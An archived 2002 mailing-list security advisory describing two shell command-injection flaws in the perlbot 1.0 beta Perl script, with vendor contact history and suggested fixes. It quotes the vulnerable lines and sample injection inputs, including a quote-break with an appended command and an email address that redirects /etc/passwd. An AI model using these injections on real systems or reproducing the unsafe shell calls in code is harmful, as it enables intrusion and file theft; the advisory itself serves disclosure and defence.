81655 2002-10-19 01:04 /111 rader/ guejez <guejez@scan-associates.net> Importerad: 2002-10-19 01:04 av Brevbäraren Extern mottagare: vulnwatch@vulnwatch.org Mottagare: Bugtraq (import) <2017> Ärende: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution ------------------------------------------------------------ perlbot 1.0 beta - Remote Command Execution Discovered By guejez of scan-associates.net About perlbot: ------------------ [quote from perlbot website] "" [/quote from perlbot website] perlbot is avaliable at http://stigmata.gothcafe.com/~madhater Vulnerable (tested) Versions: -------------------- Perlbot version 1.0 beta on SuSe 7.3 Vendor Contact: ---------------- 07-22-02 - Emailed myneid ^^at^^ gothcafe.com Alerted him of this vulnerability 07-22-02 - Recieved email confirming vulnerabilties and stating fixes could be in new version. Vulnerabilities: ---------------- -- Command Execution 1. Due to no input filtering and a call to the shell the script could be used to execute any command it has permission to. A more detailed explaination: The script does not limit the characters sent to the shell from user input. The problem is in this line: foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`) Which allows an attacker to "break out" of the quotes and issue any command they wish by doing something like anything";cmd. Other abuses could be issuing commands with `cmd` and $(cmd) or \xxx where xxx is the octal value of any character. Some form of user input filtering must be used. 2. Due to no input filtering and a bad open() call when the script attempts to send email it is possible to execute commands. A more detailed explaination: The script attempts to send an email to the user. It takes the user's email address and passes it to the shell as an argument to the mail program: open (MAIL,"| $sendmail $recipient") || die $!; This means things like hacker@scan-associates.net < /etc/passwd could be used as an email address to get any file from the system the script has permission to read. Or command execution is possible with hacker@scan-associates.net ; cmd. Inorder to prevent this simply take the $recipient value out of the shell call. Proof Of Concept: ----------------- No proof of concept will be givin for these issues. Fix: ---- According to the author a fix could be in a new verison of the script. The script's homepage was down at the time of this advisory, so here is the suggested fix. Replace the following line: my $word=$'; With: my $word=$'; $word =~ s/[^\w]//g; And replace the following line: open (MAIL,"| $sendmail $recipient") || die $!; With: open (MAIL,"| $sendmail -t") || die $!; Thanks: ------- irc.efnet.org #vuln - various people helping with perl security issues. pokleyzz, sk , and all of scan-associates.net -------------------------------------------------------------------------- http://www.scan-associates.net/ (81655) /guejez <guejez@scan-associates.net>/(Ombruten)